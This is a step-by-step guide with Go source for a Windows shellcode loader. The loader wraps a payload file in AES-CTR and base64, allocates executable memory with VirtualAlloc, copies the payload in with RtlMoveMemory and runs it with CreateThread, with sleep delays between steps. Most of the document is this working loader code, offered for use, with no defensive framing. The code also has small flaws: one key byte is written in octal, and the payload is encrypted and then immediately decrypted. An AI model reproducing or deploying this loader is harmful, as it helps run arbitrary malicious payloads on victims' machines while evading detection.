Complete Guide to Executing Encrypted Shellcode with Go

This code provides a step-by-step guide to executing encrypted shellcode with Go. It involves encrypting a payload with AES and base64 encoding, then decrypting and executing the shellcode using Windows API functions.

1. Import Necessary Packages:

import (
	'crypto/aes'
	'crypto/cipher'
	'encoding/base64'
	'io/ioutil'
	'syscall'
	'time'
	'unsafe'
)

This imports packages for AES encryption, base64 encoding, file reading, Windows API functions, time delays, and unsafe operations.

2. Define Constants:

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

These constants define memory allocation flags and protection flags for Windows API functions.

3. Define AES Encryption Key and Cipher Function:

var AesKey = []byte{
	0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B,
	0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B,
	0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B,
}

type CipherFunc func(key []byte, src []byte) []byte

func AesCipher(key []byte, src []byte) []byte {
	block, _ := aes.NewCipher(key)
	iv := make([]byte, aes.BlockSize)
	stream := cipher.NewCTR(block, iv)
	dst := make([]byte, len(src))
	stream.XORKeyStream(dst, src)
	return dst
}

func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	return cipher(key, src)
}

These functions define the AES encryption key, the AES cipher function, and a generic cipher function for applying any cipher with a given key and source.

4. Define Base64 Encoding and Decoding Functions:

func Encode(src string) string {
	payloadBytes := []byte(src)
	encodedBytes := Crypt(AesCipher, AesKey, payloadBytes)
	bdata := base64.StdEncoding.EncodeToString(encodedBytes)
	return bdata
}

func Decode(src string) []byte {
	decodedBytes, _ := base64.StdEncoding.DecodeString(src)
	payloadBytes := Crypt(AesCipher, AesKey, decodedBytes)
	return payloadBytes
}

These functions encode and decode a string payload using AES encryption and base64 encoding.

5. Define Windows API Functions:

var (
	kernel32      = syscall.NewLazyDLL("kernel32.dll")
	ntdll         = syscall.NewLazyDLL("ntdll.dll")
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")
	RtlMoveMemory = ntdll.NewProc("RtlMoveMemory")
	CreateThread  = kernel32.NewProc("CreateThread")
)

These variables define Windows API functions for memory allocation, memory copying, and thread creation.

6. Define Shellcode Execution Function:

func exec(charcode []byte) {
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	time.Sleep(5 * time.Second)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5 * time.Second)
	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	time.Sleep(5 * time.Second)
	syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)
}

This function allocates memory, copies shellcode to the allocated memory, creates a thread to execute it, and waits for the thread to finish.

7. Define File Reading Function:

func readFile(filename string) []byte {
	data, _ := ioutil.ReadFile(filename)
	return data
}

This function reads a binary file and returns its contents as a byte array.

8. Define Main Function:

func main() {
	payload := string(readFile("./payload.bin"))
	encodedPayload := Encode(payload)
	shellCodeHex := Decode(encodedPayload)
	exec(shellCodeHex)
}

The main function reads a binary file named "payload.bin" into a string, encodes the string with AES encryption and base64 encoding, decodes the encoded payload, and executes the resulting shellcode with the exec function.